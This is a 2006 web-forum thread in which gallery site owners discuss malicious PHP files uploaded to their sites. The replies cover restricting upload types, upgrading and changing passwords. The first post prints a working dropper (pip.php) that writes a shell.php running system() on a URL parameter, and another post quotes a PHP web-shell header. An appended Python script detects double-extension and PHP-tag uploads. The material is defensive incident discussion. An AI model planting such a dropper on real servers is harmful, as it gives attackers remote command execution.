
Site hacked..

Started by togi, February 27, 2006, 01:47:46 AM


togi

My site was hacked once.. upgraded it to a newer version and it seems like I am getting strange visitors..
I have limited uploads to images and txt/pdf and movies..

How do I stop these hackers from coming back?

here is one of the files uploaded.. title is pip.php

<?php
     $suntzu=fopen("shell.php","w");
     fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>");
     fclose($suntzu);
     chmod("shell.php",777);
?>


there was another guy today.. but deleted it without saving..
he uploaded an imagename.php.jpg ... I found it fishy so I deleted it..

would like to hear measures others have taken to make the site free from
hackers.. thank you very much!


kegobeer

Here are some ideas:

Don't allow visitors to upload files.  Verify all of your members prior to allowing them to upload files.  Only allow jpeg files.
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

togi

Thanks for the tip.. I set the movie, audio and document type to "none", is that OK?  I set images to jpg/gif/tif

Abbas Ali

Upgrade to 1.4.4 ASAP. The above file "pip.php" was uploaded to your site because of a recent vulnerability found in CPG. The hacker must have extracted your database password and other details. Please change them ASAP.
Chief Geek at Ranium Systems

Fudgemaster

I got a new user also, uploaded 2 files.
123.php.php.rar and 123.php.php7.rar

Both are php files..


*****************************************************************************************
*                           PHPSHELL.PHP  BY MACKER     30 March 2003                   *
*****************************************************************************************
*                                                                                       * 
*   Welcome to Macker's PHPShell script...                                              *
*   This script will allow you to browse webservers etc...                              *
*   Just copy the file to your directory and open it in your Internet Browser.          *
*                                                                                       *
*   The webserver should support PHP...                                                 *
*                                                                                       *
*   You can modify the script if you want, but please send me a copy to:                * 
*                               DRAZZ01@HOTMAIL.COM                                     *
*****************************************************************************************

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !!
!!                Sites or even the server... You are responsible for your own deeds.  !!
!!                The admin of your webserver should always know you are using this    !!
!!                script.                                                              !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*/


Damnit. And all because of me. I upgraded to 1.4.3 and didn't realize the upload permissions get reset in the upgrade =(
The remotethingamajigger update is applied now and passwords are renewed.

Gotta go through every dir etc. for crap  :'(
--
It's an insane world.. But I'm proud to be a part of it.

Stramm

Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

Fudgemaster

Quote from: Stramm on February 27, 2006, 02:29:17 PM
Fudgemaster...
if your server is properly configured then it won't parse rar as php and your box didn't get hacked at all. Just a lame try of a script kiddie with no effect at all. Still it's best to disable all extensions you don't need

Oh thank you. That was a relief to hear.
I almost soiled myself at work today when I noticed that extra crap on my
site because I've never allowed anyone else than myself to upload anything.
--
It's an insane world.. But I'm proud to be a part of it.
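
Added example, not part of any post in this thread and not Coppermine code: a sweep of an upload directory for the kinds of file the posters found (pip.php, imagename.php.jpg, 123.php.php7.rar). The extension lists, function names and the sample tree are assumptions; the sample contents are constructed stand-ins.

```python
import os
import re
import tempfile

# Assumed lists, adjust to the site: final extensions the gallery should accept,
# and name segments a web server may hand to the PHP interpreter.
ALLOWED_FINAL = {"jpg", "jpeg", "gif", "tif", "tiff"}
SCRIPT_SEGMENT = re.compile(r"^(php\d?|phtml|phar|pht)$", re.IGNORECASE)
PHP_MARKER = re.compile(rb"<\?php", re.IGNORECASE)


def classify(path):
    """Return the reasons a file is suspicious (empty list means clean)."""
    reasons = []
    # Every dot-separated part after the stem, so "a.php.jpg" yields ["php", "jpg"].
    segments = os.path.basename(path).split(".")[1:]
    if any(SCRIPT_SEGMENT.match(s) for s in segments):
        reasons.append("script extension in name")
    if not segments or segments[-1].lower() not in ALLOWED_FINAL:
        reasons.append("final extension not allowed")
    with open(path, "rb") as fh:
        if PHP_MARKER.search(fh.read(1024 * 1024)):  # only the first 1 MiB is read
            reasons.append("PHP open tag in content")
    return reasons


def sweep(root):
    """Walk root and map relative path -> reasons for every flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = classify(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


def demo():
    """Build a constructed sample tree using file names from the thread and sweep it."""
    root = tempfile.mkdtemp()
    samples = {
        "holiday.jpg": b"\xff\xd8\xff\xe0 constructed jpeg bytes",
        "pip.php": b"<?php /* constructed stand-in */ ?>",
        "imagename.php.jpg": b"\xff\xd8\xff\xe0 <?php /* constructed */ ?>",
        "123.php.php7.rar": b"Rar! constructed",
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return sweep(root)
```

Run `sweep()` against the gallery's upload directory; a file flagged only for its name may be inert on a server that does not parse that extension as PHP, but it still shows someone tried.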